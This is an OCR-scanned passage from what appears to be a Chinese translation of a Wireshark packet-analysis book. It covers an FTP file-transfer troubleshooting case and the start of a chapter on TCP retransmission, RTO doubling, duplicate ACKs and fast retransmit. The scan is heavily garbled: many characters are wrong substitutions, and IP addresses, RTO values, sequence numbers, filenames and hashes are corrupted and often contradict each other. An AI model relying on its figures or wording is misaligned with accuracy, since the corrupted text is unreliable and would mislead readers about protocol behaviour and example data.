除了 网 络 上 的 基本 信息 流量 之 外 ， 我 们 完全 不 了 解 程序 员 开 友 的 应 
用 程序 。 捕 获 文 件 看 起 来 是 以 一 些 FTP 流 量 开始 的 ， 因 此 我 们 将 调查 这 
旦 不 是 传输 CSV 文 件 采 用 的 机 制 。 人 简洁 、 王 诊 的 通信 和 最 适合 查看 通信 沉 
量 图 了。 选择 Statistics -> Flow Graph， 然 后 单 击 “OK”。 图 10-33 最 示 了 
结果 图 像 。 


3 .0008242 172.16.16.128 172.16.16.121 : 6 台 2555 > 21 [ACK] Seq=1 Ack=1 Win=17520 Len= 台 
5 r version 09.9.3 


4 0.002749 172.16.16.121 172.16.16.128 96 Response: 226 Filezilla Serve 

5 0.002948 172.16.16.128 172.16.16.121 © 70 Request: USER salesxfer 

6 80.003396 172.16.16.121 172.16.16.128 91 Response: 331 Password required for salesxfer 
7 0.003514 172.16.16.128 172.16.16.121 69 Request: PASS p@sswerd 

8 9.064562 172.16.16.121 172.16.16.128 Response: 239 Logged on 





图 10-33 ”流量 图 提供 了 FTP 通 信和 的 快速 视图 


首先 观察 一 下 包 列 表 ( 见 图 10-34) ， 我 们 会 看 到 一 个 
172.16.16.128@ 与 172.16.16.121@ 之 间 的 基本 FTP 连 接 。 由 于 
172.16.16.128 发 起 连接 ， 因 此 我 们 猪 测 它 是 和 铬 户 疾 ，172.16.16.121 则 是 
汇总 与 处 理 数据 的 服务 器 。 流 量 图 确认 这 些 流量 只 用 到 了 FTP 协 议 ， 在 
ee 我 们 开始 看 到 来 自 客 户 端的 FTP 请 求 和 来 自 服 务 器 的 啊 
WH). 


我 们 知道 这 里 会 有 一 些 数据 传输 ， 因 此 我 们 用 FTP 的 知识 ， 定 位 开 
始 传 输 数 据 的 位 置 。FTP 连 接 和 数据 传输 是 由 客户 端 发 起 的 ， 因 此 我 们 
应 该 寻找 用 于 上 传 数 据 到 FTP 服 务 器 的 FTP STOR 命 令 。 人 简单 的 方法 是 
生成 一 个 过 滤器 。 


这 个 捕获 文件 里 到 处 都 是 FTP 请 求 命 令 ， 因 此 我 们 不 圾 要 面 对 表 达 


式 生 成 需 中 的 数 折 个 协议 和 选项 ， 只 要 在 Packet List 面 板 中 直接 生成 过 
滤器 束 行 了 。 为 此 ， 我 们 首 移 需 要 选择 一 个 出 现 有 FTP 请 求 命令 的 数据 
包 。 我 们 选择 了 数据 包 5， 这 是 最 接近 列表 顶部 的 一 个 。 然 后 展开 Packet 
Details 面 板 的 FTP section 和 USER section。 右 击 Request Command: 
USER 域 ， 并 选择 Prepare a Filter。 最 后 ， 选 择 Selected。 


这 将 生成 一 个 筛选 含有 FTP USER 请 求 命令 的 数据 包 的 过 滤器 ， 并 
出 现在 过 滤器 对 话 框 中 接着 ， 如 图 10-34 所 示 ， 编 辑 过 滤器 ， 将 单词 
USER 符 换 成 STOR @， 


现在 : 按 加 千 各 应 用 这 个 过 滤 硕 ， 你 会 看 见 捕获 文件 里 只 有 一 个 
STOR 命 令 ， 在 数据 包 64 他 中 ， 





[ 几 | ftp.regquest.command == TOR" 各 x =| Expression... + 








No. Time Source Destination Protocol _ Length Info 
合 64 4 .369659 172.16.16.128 172.16.16.121 FTP 83 Request: STOR store4829-83222818.csw 





图 10-34 ”这 个 过 滤 硕 有 助 于 识别 数据 从 哪里 开始 传输 


既然 我 们 a et 了 ， 就 可 以 单 击 Packet List 
面板 上 方 的 Clear 按 钮 清除 过 滤器 


查看 从 数据 包 64 开 始 的 捕获 文件 ， 我 们 看 见 这 个 数据 包 指 定 传 输 
store4829-03222010.csv 文 件 @， 如 图 10-35 所 示 。 


凑 Wireshark . Packet 64. tickedoffdeveloper 


Frame 64: 83 bytes on wire (664 bits), 83 bytes captured (664 i 

Ethernet II, Src:; IntelCor 5b:7d:4a (68:;21:;6a:5b:7d:;4a), Dst;: Vmwar :17:be (88:8c:29:;ea:17:be) 

Internet Protocol Version 4, Src: 172.16.16.128, Dst: 172.16.16. 121 

te en ol, Src Port: 2555 (2555)}, Dst Port: 21 (21), Seq: 222, Ack: 875, Len 
v File Tra re Protocol CE 

vw STOR store4829- rp sVArAn 


Request command: STOR 
Request arg: store4829-@32228]18.csv 











No.: 64 * Time: 4. 369659 * Sowrce: 172,16,16.128 * Destination: 172.16,16.121 * 





图 10-35 ”使 用 FTP 传 输 CSV 文 件 


STOR 命 令 后 面 的 数据 包 使 用 了 不 同 的 端口 ， 但 它们 被 识 列 成 FTP 
数据 传输 的 一 部 分 。 我 们 已 经 验证 数据 在 传输 了 ， 但 我 们 仍然 没有 证 明 
程序 员 是 错 的 。 为 此 ， 我 们 需要 从 捕获 的 数据 包 中 提取 传 输 文 件 ， 以 展 
示 文 件 在 网 络 中 传输 后 并 没有 被 损坏 。 


当 文 件 以 未 加 密 格 式 在 网 络 中 传输 时 ， 它 会 被 分 解 成 多 个 段 ， 并 在 
目的 地 被 重新 组 革 。 在 这 个 场景 中 ， 我 们 在 数据 包 到 达 目 的 地 并 且 疝 未 
被 组 装 之 时 捕获 它们 。 数 据 束 在 那儿 了 ， 我 们 只 需要 将 文件 提取 为 数据 
流 来 重新 组 装 它 。 为 此 ， 选 择 FTP 数 据 流 的 任 一 个 数据 包 〈 比 如 数据 包 
66) ， 并 单 击 Follow TCP Stream。 结 果 显 示 在 TCP 流 中 ， 如 图 10-36 所 
人 No 


由 于 数据 在 FTP 中 以 明文 传输 ， 所 以 我 们 能 看 到 它 ， 但 却 不 能 仪 由 
此 断定 文件 是 完整 的 。 为 了 重组 数据 ， 以 便 将 其 提取 为 原始 格式 ， 我 们 
ee As 按 钮 并 指定 数据 包 64 显 示 的 文件 名 ， 如 图 10-37 所 示 。 然 后 
电击 Save。 


保存 操作 的 结果 应 该 是 一 个 CSV 文 件 ， 这 是 对 商店 系统 传 过 来 的 文 
件 的 字 节 层次 的 复制 。 我 们 通过 比较 原始 文件 和 提取 文件 的 MD5 哈 希 值 
来 验证 该 文件 。MD5 哈 希 值 应 该 是 一 样 的 ， 如 图 10-37 所 示 。 


是 Wireshark : Follow TCP Stream (tcp.stream eq 1),,, 


StoreID ,SkF ,QTY 
4829 , 88883966 ,5 
4829 ,893932,7 
4829 ,638384,2 

于 B29 25851]3 ,4 
4829 ,697848 ,2 
4829 7865639 ,1 
4829 ,438522 ,9 

于 B29 3 从 5646 ， 百 
4829 ,626872 ,6 
4829 ,462192 ,2 
4829 ,235998 ,1 
4829, 354072 ,7 
4829,314785 ,1 
4829,137917 ,6 
4829 ,752478 ,9 
15 cent pittsl. 0 server ES H sms. 


Entire conversation (13 kB) ™ | Show data as |ASCII ™ | steam 


Hide this stream Print Save a9... Close Help 





图 10-36 ”TCP 流 显示 传输 的 数据 将 数据 流 保 存 为 原始 文件 名 


| store4829-03222010.csv Properties 
General Fle Hashes Securty Details Previous Versions 


Hash Walue 


FD38F576 
ECDAAD ?OIACED YBOLGEBCEAA420005733 
65769035E20F3749461C4AGFDEAIAC 37I06ED869 


Hash Comparison: 


ECDAADTOIACEDTBOCGEBCEA4200D05799 


HashTab v5.2.0:: S2010 1mplbits Sofbware [http: Aimplbits. coml] 


Cancal 





图 10-37 原始 文件 和 提取 文件 的 MD5 哈 希 值 相等 


通过 比较 文件 ， 我 们 可 以 证 明 网 络 并 不 是 应 用 程序 数据 库 出 错 的 原 
因 。 文 件 从 商店 传输 到 收集 服务 从 时 是 完整 的 ， 所 以 肯定 是 应 用 程序 处 
理 文 件 时 出 销 了 。 


10.6.3 ”学 到 的 知识 


数据 包 层 面 分 析 的 一 个 好 处 是 你 不 必 人 处 理 林 乱 无 章 的 应 用 程序 。 精 
烷 的 程序 远 比 好 的 程序 要 多 ， 但 在 数据 包 层 面 ， 它 们 束 无 所 请 了 。 在 这 
个 案例 中 ， 程 序 员 关 心 的 是 应 用 程序 所 依赖 的 所 有 不 明 组 件 ， 但 最 终 ， 
他 那 耗费 数 百 行 代码 写成 的 数据 传输 不 过 束 古 FTP、TCP 和 IP 而 已 。 通 
过 使 用 我 们 了 解 的 基本 协议 知识 ， 可 以 确认 通信 过 程 军 无 差错 ， 甚 至 能 
通过 近 取 文件 证 明 网 络 正 常 。 记 住 这 个 关键 的 结论 : 无 论 手 里 的 问题 多 
么 复杂 ， 都 只 是 一 些 数据 包 而 已 。 


10.7 ] 


在 本 章 ， 我 们 讲述 了 几 个 基本 场景 ， 数 据 包 分 析 使 我 们 更 好 地 理解 
了 通信 故障 。 通 过 分 析 帅 见 苏 议 ， 我 们 可 以 及 时 得 出 并 解雇 网 络 问题 。 
你 在 现实 网 络 中 可 能 不 会 过 到 跟 这 里 完全 相同 的 场景 ， 但 本 章 讨 论 的 分 
析 技 术 应 该 能 给 你 一 些 有 区 局 及 。 





[1] 比如 防火 墙 。 一 一 详 者 注 


[2] 某 些 情况 下 并 非 Google 的 故障 ， 而 是 访问 路 径 中 存在 某 种 防火 墙 。 
一 — 译 者 注 


第 11 章 ”让 网 络 不 再 卡 





作为 一 名 网 络 管理 员 ， 你 将 花费 很 多 时 间 用 于 修复 运行 缓慢 的 计算 
机 和 服务 。 但 是 人 们 抱怨 网 络 缓慢 ， 并 不 意味 着 就 是 网 络 的 问题 。 


在 开始 处 理 网 络 缓慢 的 问题 之 前 ， 你 首 移 要 确定 网 络 是 否 真 的 很 
盆 。 你 将 在 本 章 中 学 到 这 些 拉 巧 。 


首先 ， 我 们 会 讨论 TCP 的 错误 恢复 和 流量 控制 机 制 。 然 后 ， 我 们 会 
探索 如 何 检测 网 络 缓慢 的 根源 。 最 后 ， 我 们 会 讨论 用 基线 测试 网 络 以 及 


网 络 上 运行 的 设备 与 服务 的 方法 。 读 完 本 章 后 ， 你 在 识别 、 诊 断 和 解雇 
侵 速 网 络 方面 ， 应 该 会 有 非 负 大 的 进步 。 


BE 





很 多 技术 部 可 以 用 来 排除 网 络 缓慢 故障 。 本 间 内 容 主 要 集中 在 TCP， 因 为 在 大 多 数 时 间 


口才 





你 只 需要 面 对 它 。TCP 允 许 你 执行 被 动 地 回 漳 分 析 ， 而 不 用 生成 额外 的 流量 (比如 ICMP)。 





11.1 TCP 的 错误 恢复 特性 


TCP 的 错误 恢复 特性 是 我 们 定位 、 诊 断 并 最 终 修复 网 络 高 延迟 的 最 
好 工具 。 在 计算 机 网 络 中 , “延迟 ?是 数据 包 传输 与 接收 时 间 兰 的 衡量 参 
数 。 


延 到 可 以 被 测量 为 单程 延迟 〈 从 单个 来 源 到 一 个 目的 地 ) 或 往返 延 
人 运 〔 从 来 源 到 达 日 的 地 并 返回 来 源 ) 。 妆 设备 间 通 信和 人 很 快 ， 并 且 数 据 包 


从 一 个 器 点 到 男 一 端点 所 伦 时 间 很 少时 ， 束 说 通信 和 是 低 时 延 的 。 相 反 ， 
当 数 据 包 在 来 源 和 日 的 地 则 传输 要 人 花 避 大 量 时 间 时 ， 束 议 通 信和 厦 蜗 时 延 
ee OR EE HR SR 


在 第 6 半 中 ， 我 们 讨论 了 TCP 如 何 使 用 序 写 和 确认 号 来 保证 可 徘 地 
传递 数据 包 。 在 本 章 ， 我 们 将 再 次 关注 序 亏 和 确认 亏 ， 观 穴 当 高 时 延 导 
致 这 些 号 但 乱 序 抵达 《或 根本 没有 接收 到 ) 时 ，TCP 是 如 何 啊 应 的 。 


11.1.1 TCP 重 传 


重 传 数据 包 是 TCP 最 基本 的 错误 恢复 特性 之 一 ， 它 被 设计 用 来 对 付 
数据 包 丢 失 。 


数据 包 技 失 可 能 有 很 多 原因 ， 包 括 出 故障 的 应 用 程序 、 流 量 人 负载 沉 
重 的 路 由 帮 或 者 临时 性 的 服务 中 靳 。 数 据 包 层 次 上 的 移动 速度 非 第 快 ， 
而 且 数 据 包 丢失 通 前 是 暂时 的 ， 因 此 ITCP 能 人 否 检 测 到 数据 包 丢 失 并 从 中 
恢复 显得 全 关 重 要。 


决定 是 个 有 必要 重 传 数据 包 的 主要 机 制 叫 作 重 传 计时 右 。 这 个 计时 
器 负责 维护 一 个 叫 重 传 超时 〈Retransmission timeout，RTO) 的 值 。 
当 使 用 TCP 传 输 一 个 数据 包 时 ， 残 司 动 重 传 计 时 右 。 当 收 到 这 个 数据 包 
的 ACK 时 ， 计 时 亏 束 会 停止 。 从 发 送 数据 包 到 接收 ACK 硝 认 之 间 的 时 
间 被 称 为 往返 时 间 (Round-trip time，RTT) 。 将 知 干 个 这 样 的 时 间 平 
均 下 来 ， 可 算出 最 终 的 RTO 值 。 


在 最 终 算出 RTO 值 之 前 ， 传 输 操 作 系 统 将 一 下 依赖 于 默认 配置 的 
RTT 值 。 此 项 设 定 用 于 主机 则 的 初始 通信 ， 并 基于 接收 到 的 数据 包 RTT 
进行 调整 ， 以 形成 真正 的 RTO。 


一 旦 RTO 值 确定 下 来 ， 重 传 定 时 器 就 被 用 于 每 个 传输 的 数据 包 ， 以 
确定 数据 包 是 否 于 失 。 图 11-1 阐 述 了 TCP 重 传 过 程 。 


数据 
重 传 1 {RTO) 
重 传 2 (RTO x2) 
重 传 3 (RTOx4) 
传输 主机 重 传 4(RTOx 8) 接收 主机 


重 传 5 (RTOx16) 


| Ce 


没有 响应 = 连接 断 开 





图 11-1 TCP 重 传 过 程 的 概念 视图 


当 数 据 包 被 发 送出 去 ， 但 接收 方 没 有 发 送 TCP ACK 数 据 包 时 ， 传 输 
主机 惑 假 设 原 来 的 数据 包 丢 失 了 了， 并 重 传 它 。 重 传 之 后 ，RTO 值 翻 倍 。 
如 有 末 在 到 达 那 个 值 之 前 一 直 没 有 接收 到 ACK 数 据 包 ， 则 将 发 生 另 一 次 重 
传 。 如 果 下 一 次 重 传 还 是 没有 收 到 ACK， 那 么 RTO 值 将 翻 倍 。 每 次 重 
传 ，RTO 值 都 将 翻 倍 ， 这 个 过 程 会 持续 到 收 到 一 个 ACK 数 据 包 ， 或 者 发 
送 方 达到 配置 的 最 大 重 传 次 数 为 止 。 


好 大 单传 次 数 取 决 于 传输 操作 系统 上 的 配置 。 默 认 情 况 下 ， 
Windows 主 机 最 多 重 传 5 次 ， 大 部 分 Linux 主 机 则 默认 重 传 15 次 。 这 个 选 
项 在 两 个 操作 系统 中 都 是 可 配置 的 。 


要 看 TCP 重 传 的 例子 ， 请 打开 tcp_retransmissions.pcap 文 件 ， 它 包含 
了 6 个 数据 包 。 第 一 个 数据 包 如 网 11-2 所 示 。 


这 是 一 个 TCP PSH/ACK 数 据 包 合 ， 包 含 648 字 市 的 数据 信 ， 从 
10.3.30.1 发 送 到 10.3.71.7@。 这 是 一 个 典型 的 数据 包 。 


在 正常 条 件 下 ， 你 会 期 每 在 发 送 第 一 个 数据 包 之 后 ， 很 快 就 能 看 到 
呵 应 的 TCP ACK 数 据 包 。 然 而 ， 在 这 个 例子 中 ， 下 一 个 数据 包 是 一 次 重 
传 。 通 过 在 Packet List 面 板 中 查看 这 个 数据 包 ， 你 就 能 得 出 这 个 结论 。 
Info 列 明确 表明 了 [TCP Retransmission]， 并 且 这 个 数据 包 以 黑 底 红字 出 
现 。 图 11-3 显 示 了 Packet List 面 板 中 列 出 的 重 传 例子 。 


成 Wireshark . Packet 1 .tcp_retransmissions 


Frame 1: 786 bytes ire (5648 bits), 786 bytes captured (5648 bits) 


Inter es I otocol Version 4, Src: 10.3.38.1, Dst: 19.3.71.7 
着 a Control Protocol, Src Port: 1848 (1848), Dst Port: 1643 (1643), Seq: 1, Ack: 1, Len: 648 


Seque umbe 
[Next sequence number 
Acknowledement number: 
Header Length: 28 bytes 
Flags: 9x618 【PSH，ACK) 人 
in ze Value: 8769 
ow size: 8769] 
ze scaling factor: -1 (unknown)] 
Checksum: wr 9b5f [validation disabled] 
Urgent pointe @ 
[SEQ/ACK pe 
Y Data (648 bytes) © 
Data: 783ece4b27bldb9282dea4181d8d86f87358641b579cd2edd... 
[Length:; 648] 











No.: 1 * Time: 0.000000 " Source: 10.3.30.1 * Destination: 10.3.71.7 * Protoeol: TCP.43 PS ACK) Seq=1 Ack=1 Win=B8760 Len=648 ETHERNET FRAME CHECK SEQUENCE IN 








图 11-2 包含 数据 的 简单 TCP 数 据 包 


Destination Protocol Length Info 
1 190.3.71.7 796 1048 > 1043 [Psh， ACK] Seq=1 Ack=1l Mins8766 Len=648 [ETHERNET FRAME CHECK SEQUENCE INCORRECT] 
2 9.29060696 19.3.39.1 19.3.71.7 766 [TCP Retransmission ] 1648 » 1943 [PSH, ACK] Seq=1 Ack=1 Min=8769 Len=648 [ETHERNET FRAME CHECK SEQUENCE INCORRECT] 
3 9.600066 19.3.30.1 10.3.71.7 766 [TCP Re sr 1648 +» 1843 [PSH, ACK] Seq=1 Ack=1 Win=8768 Len=648 [ETHERNET FRAME CHECK SEQUENCE INCORRECT ] 


4 A 10.3.71.7 766 [TCP Retransmission] 1648 » 1643 [PSH, ACK] Seq=1 Ack=1 Nin=8766 Len=648 [ETHERNET FRAME CHECK SEQUENCE INCORRECT] 
EL 19.3.71.7 766 [TCP tn 1648 > 1943 [PSH, ACK] Seq=1 Ack=1 Win=8760 Len=648 [ETHERNET FRAME CHECK SEQUENCE INCORRECT] 
6 4.805066 19.3.39.1 10.3.71.7 766 [TCP Retransmission] 1648 » 1843 [PSH, ACK] Seq=1 Ack=1 Win=8768 Len=648 [ETHERNET FRAME CHECK SEQUENCE INCORRECT] 





图 11-3 ”Packet List 面 板 中 的 重 传 


如 图 11-4 所 示 ， 你 也 可 以 通过 查看 Packet Details 和 Packet Bytes 面 板 
确定 它 是 含 是 重 传 数据 包 。 


主意 ，| 际 了 IP eis eid i ed 站 ， 这 个 数据 包 与 最 初 
的 归 据 包 完全 了 致 。 为 了 验证 这 个 结论 ， 可 在 Packet Bytes 面 板 中 比较 这 
个 重 传 数据 包 和 最 切 的 数据 包 人 @。 


在 Packet Details 面 板 中 ， 注 意 到 重 传 数据 包 的 SEQ/ACK Analysis 标 
题 下 有 一 些 额 外 的 信息 介 。 这 个 有 用 的 信息 是 由 Wireshatrk 提 供 的 ， 实 际 
上 上 并 个 包公 在 数据 包 里 。SEQ/ACK analysis 千 诉 我 们 这 硝 实 十 一 个 重合 
合 ，RTO 值 0.206s 四 是 基于 与 数据 包 1 侠 的 时 间 委 值 算 出 来 的 。 


丛 看 剩 下 的 数据 包 应 该 是 闫 似 的 结 末 ， 唯 一 的 不 同 在 于 站 
identification、Checksum 域 以 及 RTO 值 。 。 为 了 显示 每 个 数据 包 之 间 的 时 
间 间 隔 ， 如 图 11-5 所 示 ， 可 以 查看 Packet List 面 板 的 Time 列 。 在 这 里 ， 
你 看 到 每 一 次 重 传 后 RTO 值 翻 舍 ， 时 间 呈 指数 增长 。 


磊 Wireshark , Packet 2 ， tcp_retransmissions 


> Frame 2: 786 bytes on wire (5648 bits), 786 bytes captured (5648 bits) 
> 


> Internet Protocol Version 4, Src: 19.3.39.1，Dst: 19.3.71.7 
v Transmission Control Protocol, Src Port: 1948 (1848), Dst Port: 1843 (1843), 


source Port: 1648 
Destination Port: 1943 
[Stream index: @] 


Acknowledgment number: 1 
Header Length: 28 bytes 
Flags: Gx818 (PSH, ACK) 
Window size value: 8768 
[Calculated window size: 8769] 
[Window size scaling factor: -1 (unknown)] 
Checksum: Bx9b5f [validation disabled] 
Urgent pointer: 9 

[Bytes in flight: 648] 


> [Expert Info (Note/Sequence): This frame a (suspected) retransmission] © 
[The RTO for this segment was: 9.296666666 seconds] 全 
Retransmitted TCP segment data (648 bytes) 
No.: 2 “ Time: 0.206000 * Source: 10.3.30.1 * Destination: 10.3.71.7 ° Proweol: TC. 3 {PSH, 4CU Seq=1 Ack=1 Win=8760 Len=648 [ETHERNET FRAME CHECK SEQUENCE 内 





图 11-4 一 个 重 传 数据 包 








图 11-5” ”Time 列 显示 了 RTO 值 的 增长 


传输 设备 使 用 TCP 的 重 传 特性 来 检测 数据 包 丢 失 并 从 中 恢复 。 下 一 
机 
恢复 。 


11.1.2 TCP 备 复 确认 和 快速 重 传 


当 接 收 方 收 到 乱 序 数据 包 时 ， 就 发 送 重复 的 TCP ACK 数 据 包 。TCP 
人 








建立 一 个 新 的 TCP 连 接 时 ， 初 始 序号 〈Initial sequence number， 
ISN) 是 握 手 过 程 中 交换 的 最 重要 信息 之 一 。 一 旦 设置 好 连接 两 站 的 
ISN， 接 下 来 传输 的 每 一 个 数据 包 痢 将 按照 数据 载 傈 的 大 小 增长 序 与 。 


举 个 例子 ， 一 台 主 机 的 ISN 是 5000， 它 发 送 一 个 500 字 节 的 数据 包 给 
接收 方 。 一 旦 接收 到 此 数据 包 ， 接 收 方 束 会 根据 以 下 规则 啊 应 一 个 包含 
确认 号 5500 的 TCP ACK 数 据 包 : 

接收 数据 的 序号 + 接收 数据 的 字 币 数 = 发 出 的 确认 号 

在 这 个 运算 中 ， 返 回 到 发 送 方 的 确认 志 实际 上 束 是 接收 方 期 符 下 放 

接收 的 数据 包 序 号 。 图 11-6 中 可 以 看 到 一 个 这 样 的 例子 。 


SEQ#: 5000 数据 大 小 : 500 


ACK #: 5500 
| | SEQ#: 95500 数据 大 小 :500 
一 ACK #: 6000 
a 
传输 主机 SEQ #: 6000 数据 大 小 :500 接收 主机 


ACK #: 6500 


图 11-6 TCP 序号 和 确认 号 


序列 亏 使 数据 接收 方 检 负数 据 包 丢失 成 为 可 能 。 当 接收 方 奶 踪 正在 
接收 的 友 写 时 ， 如 直到 不 合 顺 友 的 夺 写 ， 它 束 知 道 数 据 包 丢失 了 。 


当 接 收 方 收 到 一 个 预料 之 外 的 序号 时 ， 它 会 假设 有 一 个 数据 包 在 传 
得 中 丢失 了 。 为 了 正确 重组 数据 ， 搂 收 方 必 须要 得 到 丢失 的 数据 包 ， 
此 它 重 新 及 送 一 个 包含 丢失 数据 包 的 序号 的 ACK 数 据 包 ， 以 通知 及 送 方 
重 传 该 数据 包 。 


当 传 输 主机 收 a 到 3 个 来 目 接 收 方 的 午 复 ACK 时 ， 它 束 假 设 这 个 数据 
包 确 实在 传输 中 丢失 了 ， 并 立刻 友 送 一 个 快速 重 传 。 一 旦 触 友 快速 重 


一 一 一 


传 ， 其 他 所 有 正在 传输 的 数据 包 都 要 靠 迎 ， 百 到 把 快速 重 传 数据 包 及 送 


出 去 为 止 。 图 11-7 描 述 了 这 个 过 程 。 


SEQ#: 5000 数据 大 小 : 500 


ACK #: 5500 


SEQ #: 6000 数据 大 小 : 500 


重复 ACKI1j#: 5500 


重复 ACK[2)#: 5500 
传输 主机 接收 主机 
重复 ACK(3)#: 5500 


| 


快速 重 传 SEQ #:; 5500 数据 大 小 : 500 


ACK #: 6000 


图 11-7 来自 接 收 方 的 重复 ACK 导 致 快速 重 传 


你 将 在 tcp_dupack.pcap 文 件 中 发 现 重 复 ACK 和 快速 重 传 的 例子 。 捕 
锋 记 录 中 的 第 一 个 数据 包 ， 如 图 11-8 所 示 。 


羔 Wireshark .Packet 1 .tcp dupack 





>» Frame 1: 78 bytes on wire (624 bits), 78 bytes captured (624 bits) 

> Ethernet II, Src: HewlettP ad4:cl:c6 (68:16:35:a4:c1:c6), Dst: All-HSRP-routers 81 (98:90:9c:97:ac:B1) 

» Internet Protocol Version 4, Src: 172.31.136.85, Dst: 195.81.292.68 各 

Y Transmission Control Protocol, Src Port: 38769 (38768), Dst Port: 89 (88), Seq: 764338729，Ack: 1316973186, Len: 9 


388 
[Stream index: 名 ] 
[TCP Segment Len: 8] 
uence number: 764338729 
number: 1316973186 © 
Header Length: 44 bytes 
> Flags: 8x818 (ACK) 
Window size Value 382 
[Calculated window size: 382] 
[Window size scal factor: -1 (unknown)] 
> Checksum: @xdlbe idation disabled] 
pointer: 名 
(24 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps, No-Operation (NOP), No-Operation (NOP), SACK 





ing 
[val 





Neo: 1 " Timer 0. O00000 ' Source: 172.31,136.85 " Destination: 195.81.202.68 " Protoeol: TCP " 1...04338729 Ack=1310973186 Win=382 Len=0 TSval=22247173 TSecr=1332354 SLE=1310978658 SRE=131098 


Ce re 





图 11-8 ” ACK 显示 了 下 一 个 期 待 的 序号 


在 网 络 中 这 个 TCP ACK 数 据 包 从 数据 接收 方 〈172.31.136.85) 去 往 
发 送 方 〈195.81.202.68) 个 ， 包 含 了 一 个 对 捕获 文件 之 前 的 数据 包 的 确 
Yo 





Pe 
中 


默认 情况 下 ，Wireshark 使 用 相对 序号 来 简化 对 这 些 数字 的 分 析 ， 但 在 接 下 来 的 几 节 中 ， 
并 未 在 例子 和 截图 中 使 用 这 个 特性 。 使 用 如 下 方法 可 关闭 此 项 功能 ， 选 择 Edit->Preferences， 
在 Preferences 窗 口中 选择 Protocols， 然 后 选择 TCP 区 段 ， 最 后 取消 Relative sequence numbers 和 
window scaling 劳 边 的 复 选 杠 。 





如 图 11-9 所 示 ， 此 数据 包 中 的 确认 号 古 1310973186 人 @， 这 应 该 是 接 
收 的 下 一 个 数据 包 的 序号 。 


三 Wireshark .Packet 2.tcp_dupack 





Frame 2: 1434 bytes on wire (11472 bits), 1434 bytes captured (11472 bits) 
” Ethernet II, Src: CiscoInc 72:15:868 (866:68b:be:72:15:88), Dst: HewlettP_a4:cl:c6 (660:16:35:a4:c1:c6) 
Internet Protocol Version 4, Src: 195.81.282.68, Dst: 172.31.136.85 
Y Transmission Control Protocol, Src Port: 88 (88), Dst Port: 38768 (38768), Seq: 1318984138, Ack: 784338729, Len: 1368 


xz ©] 
[TCP Segment Len: 1368] 
e number: 1319984139 人 @ 
e e number: 1318985498] 
Acknowledgment number: 784338729 
Header Length: 32 bytes 
>》 Flags: 8x818 (ACK) 
Window size value: 188 
LN window size: 188] 
[Window size scaling factor: -1 (unknowny)] 


» Checksum: @x em [validation disabled] 
Urgent poi 名 


> Options: i i No-Operaticon (NOP), No-Operation (NOP), Timestamps 
> [SEQ/ACK analysis] 





No 2 " Timer O01 " Sourcer I95. 81.202.68 " Destination: 172.31.136.85 " Protwweol: TCP Len... Inio: BO — 38760 [ACK) Seq=1310984130 Ack= T04338729 Win=i08 len=1368 TSval=1332354 TSecr=22 


rs 大 要 





图 11-9 ”此 数据 包 的 序号 与 预料 的 不 同 


很 遗憾 ， 下 一 个 数据 包 的 序号 是 1310984130 @， 并 非 是 我 们 所 期 
竺 上 时。 这 表明 期 竺 的 数据 包 在 传输 中 芮 名 其 妙 地 丢失 了 。 如 图 11-10 所 
示 ， 接 收 主 机 注意 到 这 个 数据 包 的 序号 不 从 ， 就 在 捕获 记录 的 第 三 个 数 
据 包 中 发 送 一 个 重复 的 ACK。 


过 得 看 以 下 信息 的 其 中 一 个 ， 你 融 可 以 确定 这 是 一 个 重复 的 ACK 
让 据 包 ， 


e。 Packet Details 面 板 中 的 Pnfo 列 。 这 个 数据 包 以 黑 底 红字 呈现 。 
e。 SEQ/ACK Analysis heading 下 的 Packet Details 面 板 。 知 展开 此 标题 ， 
你 会 发 现 这 个 数据 包 侯 列 为 数据 包 1 的 重复 ACK。 





堪 Wireshark .Packet 3 ,tcp_dupack 一 口 XxX 





Frame 3: 78 bytes on wire (624 bits), 78 bytes captured (624 bits) 
Ethernet II，Src: HewlettP a4:cl:c6 (80:16:35:;a34:c1:c6), Dst: All-HSRP-routers 81 (80:00:90c:087:ac:01) 
Internet Protocol Version #4, Src: 172.31.136.85, Dst: 195.81.2682.68 
Y Transmission Control Protocol, Src Port: 38768 (38768), Dst Port: 88 (88), Seq: 764338729, Ack: 1319973186，Len: 9 
Source Port: 38766 
Destination Port: 88 
[Stream index: 8@] 
[TCP Segment Len: 98] 
Sequence number: 784338729 
Acknowledgment number: 1318973186 
Header Length: 44 bytes 
» Flags: 8x818 (ACK) 
Window size value: 382 
[Calculated window size: 382] 
[Window size scaling factor: -1 (unknown)] 
” Checksum: @xcc66 [validation disabled] 
Urgent pointer: 9 
Options: (24 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps, No-Operation (NOP), No-Operation (NOP), SACK 
[SEQ/ACK analysis] 
> [TCP Analysis Flags] 
[Duplicate ACK #: 1] 
Y [Duplicate to the ACK in frame: 1] OO 
» [Expert Info (Note/Sequence): Duplicate ACK (#1)] 


< > 








Ar 了 Timer 0. O00011 « Sourcer 172.31.136.85 * Destination: 195.81.202.68 " Protocol: TCP « Le.. P04338729 Ack=13109731886 Win=382 Len=0 TSval=22247173 To9ecr= 1332354 SLE=1310970858 SRE=1310% 








图 11-10 ”第 一 个 重复 ACK 数 据 包 
如 图 11-11 所 示 ， 接 下 来 的 几 个 数据 包 继 续 这 个 过 程 。 


No. Time Source Destination Protocol Lenagth Info 

~ 10.000000 172.31.136.85 195 .81.202.668 TCP 78 38760 3 86 [ACK] Seq=704338729 Ack=1318973186 Win=382 Len=@ TSval=22247173 TSecr=1332354 . 
2 9.0969199 195.81.292.68 172.31.136.85 TCP 1434 88 > 38768 [ACK] Seq=1318984138 Ack=784338729 Win=188 Len=1368 TSval=1332354 TSecr=222471... 
30.000011 172.31.136.85 195 .81.202.685 TCP 78 [TCP Dup ACK 1#1|] 38760 > 80 [ACK] Seq=764338729 Ack=1316973186 Win=382 Len=@ TSval=22247.. 
I 和 DB.BBB693 195.81.282.68 1434 8@ 2 38768 [ACK|] Seq=1318985498 Ack=784338729 Win=188 Len=1368 TSval=1332354 TSecr=222471... 
p55 0.000010 172.31.136.85 195 .8B1L.202.68 TCP 78 [TCP Dup ACK 1#2|] 38769 > 80 [ACK] Seq=764338729 Ack=1316973186 Win=382 Len=0O TSval=22247.. 
EG .000121 195.81.282.68 172.31.136.85 TCP 1434 80 > 387608 [ACK] Seq=1310986866 Ack=794338729 Min=108 Len=1368 TSval=1332354 TSecr=222471... 
